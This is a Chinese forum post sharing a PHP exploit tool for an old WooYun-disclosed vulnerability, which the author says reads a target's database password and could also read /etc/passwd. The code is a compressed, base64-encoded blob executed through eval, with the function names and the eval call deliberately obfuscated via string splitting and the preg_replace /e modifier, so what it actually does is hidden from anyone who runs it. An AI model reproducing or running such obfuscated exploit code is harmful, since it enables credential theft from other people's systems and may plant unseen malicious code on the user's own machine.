乌云N早以前就爆出来的漏洞,详见http://www.wooyun.org/bugs/wooyun-2012-010072 最近我在学习php,就是为了写些个小工具出来玩玩,就拿了这个最简单的漏洞来练手了,希望兄弟们多支持!!!

其实利用这个漏洞还可以读/etc/passwd等文件,兄弟们可以自由发挥,而我新手只会写个读数据库密码的东西,兄弟们别bs我就行了。

代码如下,请保存为*.php 执行即可:

<?php
$enfile="pVTNbxtFFL9b8v/wiKrsurF3vekHqY1blSg0B4os4RYQrqzx+O2HMp7Zzo6zTlH/GNRD1RugkEMitSU5UIE4UaiEyoUDl4ozCFSJN7tO2sTtgbKaw+x7v/cx7/feq1Yg1Yk0A+061cpS4z9+S9UKHH7d9e7q1Q8H1y/Ad8/v//rgt4On+892vnn0+drH3ZdQ735yZ3fn4ZPHXz/afg55nns5SwwTSqLH5Ztl4NTakITgnmI64vAOnKnBZ//3VdcyZBG2II1TcMAD63vz0+YNujoQq8xAykxcrazTtQWGtGggQ72JGtwk9S1EsjHWqpUuAVsFHIyyDvk4q1bWpmycitdFEIozUYTxSwP/zcmx5cFpYtpwG1BrpQcaU6VNIiP3bdKdKuJ0ZgkEN0hSJHsoWbaSiRYkcPxEjnDqUU6Xxh0qkebxIuukk6FI+IBKMMgmUYSZGWzgVq70aJHsOmzIF292PM+nwxmPMfO5kmESZf6IGTZkGVqPDoUhuUFps0nZllBs5NrIM35TjdFgzAyPXefI0nfqR2Y1S/xx5IAJQei+4/bzpVrfgc5FOPp52ZZuGrOJKJ0gjxU4P/+59/fBP3d2C3pKLVWj5GihLxfaM1zZ73O44CTux4O9u6/wt3wSd/AUYP/ZHO7MSdyXf3z7xZPdOdzZF7jblnOR4dGTfvjrp/tf7W3//viX7e/37+1sOxYTTiQ3iZLHi042kVBDJsoOqZdtQSTZ0hNDC1fWerBgQxftQiGLLoH1Xq/rB17Q10UKJdwjfDkrhbM5Hc2bblyOiIgWXFW3EiGYf85rgvsRdZzKM/igB+e9oA16sxWseM0aXEG+ofzlZtCkE8B7icZQTX2rnPN+mXNM7Zzi1PixGYs6S1NqWWZf7U+tZGl6UjoW7Zudpnehfto/XdxW5vyulr3T6G2lNMnHrBu02xqh0uMGFQUlVyMcvSavxvtMRpNi3dyKG1y+KozEgqEWrAqVoUUcosKUuAgzRdVIUbozrlaas6F5iwCWylGCrjNzZPdQMfRrdh3Y/UA9kOvEoEvoehnZboYh4xt27KlL8jgRSO5CVKFFFWNSAijFUKNtG2scNJfPlh65TbXAEm1oJlqWBlZ56WK18i8=";
$b=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef");
$g=str_replace('X','','gXXzXXiXXnXXXXfXXXlXXaXXXtXXXXXe');
preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'($g($b($enfile)))','a');
?>